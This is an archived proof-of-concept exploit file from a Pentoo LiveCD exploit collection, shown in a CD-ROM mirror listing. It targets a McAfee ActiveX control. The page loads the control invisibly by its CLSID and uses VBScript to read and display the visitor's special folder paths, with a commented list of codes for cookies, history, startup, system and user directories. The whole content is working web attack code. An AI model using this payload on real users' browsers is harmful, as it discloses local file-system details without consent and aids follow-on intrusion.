home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / antivirus / mcafee / mcafeeInfDisclosurePOC.txt < prev   
Encoding:
Text File  |  2005-02-12  |  1.1 KB  |  41 lines

  1. <OBJECT ID="MCFS" WIDTH=0 HEIGHT=0
  2. CLASSID="CLSID:EF791A6B-FC12-4C68-99EF-FB9E207A39E6"></OBJECT>
  3.  
  4. <script language=vbscript>
  5.  
  6. sPath = MCFS.GetSpecialFolderLocation(&H0000)
  7.  
  8. 'Gets the path for the desktop folder.
  9.  
  10. document.write(sPath)
  11.  
  12. 'The Available parameters for the method and their return values:
  13. '
  14. '&H0000=desktop
  15. '&H0002=%username%start menu/programs
  16. '&H0005=%username%/my documents
  17. '&H0006=%username%/favorites
  18. '&H0007=%username%start menu/programs/startup
  19. '&H0008=%username%/recent
  20. '&H0009=%username%/sendto
  21. '&H0010=%username%/desktop
  22. '&H0013=%username%/nethood
  23. '&H0014=%windir%/fonts
  24. '&H0015=%username%/templates
  25. '&H0016=all users/start menu
  26. '&H0017=all users/start menu/programs
  27. '&H0018=all users/start menu/programs/startup
  28. '&H0019=all users/desktop
  29. '&H0020=%username%/Local Settings/Temporary Internet Files
  30. '&H0021=%username%/cookies
  31. '&H0022=%username%/local settings/history
  32. '&H0023=All Users/Application Data
  33. '&H0024=%windir%
  34. '&H0025=%windir%/system32
  35. '&H0026=%programfiles%
  36. '&H0027=%username%/My Documents/My Pictures
  37. '&H0028=%username%
  38. '&H0029=%windir%
  39.  
  40. </script>
  41.